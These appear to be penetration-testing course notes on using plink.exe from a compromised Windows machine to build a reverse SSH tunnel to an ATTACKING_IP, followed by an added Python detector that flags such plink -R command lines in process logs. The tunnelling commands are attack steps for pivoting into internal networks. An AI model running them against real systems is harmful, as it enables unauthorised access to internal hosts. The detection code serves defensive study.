Plink.exe is a Windows command line version of the PuTTY SSH client. Now that Windows comes with its own inbuilt SSH client, plink is less useful for modern servers; however, it is still a very useful tool, so we will cover it here.
Since SSH is uncommon on Windows servers, we are more likely to transfer the binary to the target and use it to set up a reverse connection with the command:

cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N

For example:

cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 USERNAME@ATTACKING_IP -i KEYFILE -N
Keys generated by ssh-keygen won’t work with plink on Windows; we need to convert them to the PuTTY format with puttygen:
sudo apt install putty-tools
puttygen KEYFILE -o OUTPUT_KEY.ppk
<aside>
💡 Note: Plink is notorious for going out of date quickly, which often results in it failing to connect back. Always make sure you have an up-to-date version of the .exe. Whilst there is a copy pre-installed on Kali at /usr/share/windows-resources/binaries/plink.exe, downloading a new copy before a new engagement is sensible.
</aside>
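For the defensive side of the `plink.exe -R` command above, the following added example (not part of the original notes) flags that pattern in process-creation command lines and extracts which internal host and port the tunnel exposes. The sample command lines, the function names and the 198.51.100.7 / 203.0.113.9 addresses are constructed for illustration.

```python
import re

# Constructed process-creation command lines (the kind of string found in the
# CommandLine field of Sysmon Event ID 1 or Security 4688); not from a real host.
SAMPLE_CMDLINES = [
    r"cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 user@198.51.100.7 -i key.ppk -N",
    r'"C:\Program Files\PuTTY\plink.exe" -batch admin@fileserver01 hostname',
    r"C:\Windows\System32\OpenSSH\ssh.exe -R 8000:172.16.0.10:80 user@198.51.100.7 -N",
    r"C:\Users\Public\PLINK.EXE -N -R 127.0.0.1:9001:10.0.0.5:3389 -i k.ppk svc@203.0.113.9",
]

# Matches on the image name only, so a renamed copy of the binary is missed.
PLINK_RE = re.compile(r'(?:^|[\\/\s"])plink(?:\.exe)?(?=[\s"]|$)', re.I)
# -R [listen_addr:]listen_port:dest_host:dest_port (IPv6 literals not handled)
REMOTE_FWD_RE = re.compile(
    r"(?:^|\s)-R\s+(?:(\S+?):)?(\d{1,5}):([^\s:]+):(\d{1,5})(?=\s|$)")
# "echo y |" answers plink's host-key prompt so the session needs no operator.
AUTO_ACCEPT_RE = re.compile(r"\becho\s+y\s*\|", re.I)


def find_plink_reverse_forward(cmdline):
    """Return the -R forward described by one command line, or None."""
    if not PLINK_RE.search(cmdline):
        return None
    fwd = REMOTE_FWD_RE.search(cmdline)
    if not fwd:
        return None
    return {
        "listen_addr": fwd.group(1),  # None when no bind address was given
        "listen_port": int(fwd.group(2)),
        "dest_host": fwd.group(3),  # internal host exposed through the tunnel
        "dest_port": int(fwd.group(4)),
        "no_shell": bool(re.search(r"(?:^|\s)-N(?=\s|$)", cmdline)),
        "key_auth": bool(re.search(r"(?:^|\s)-i\s+\S+", cmdline)),
        "host_key_auto_accepted": bool(AUTO_ACCEPT_RE.search(cmdline)),
    }


def scan(cmdlines):
    """Return (index, finding) for every command line that sets up a forward."""
    hits = []
    for i, line in enumerate(cmdlines):
        finding = find_plink_reverse_forward(line)
        if finding:
            hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for idx, f in scan(SAMPLE_CMDLINES):
        print(idx, f)
```

The piped `echo y` appears in the parent `cmd.exe` command line rather than in plink's own, so feed the function both parent and child command lines when the log source records them separately.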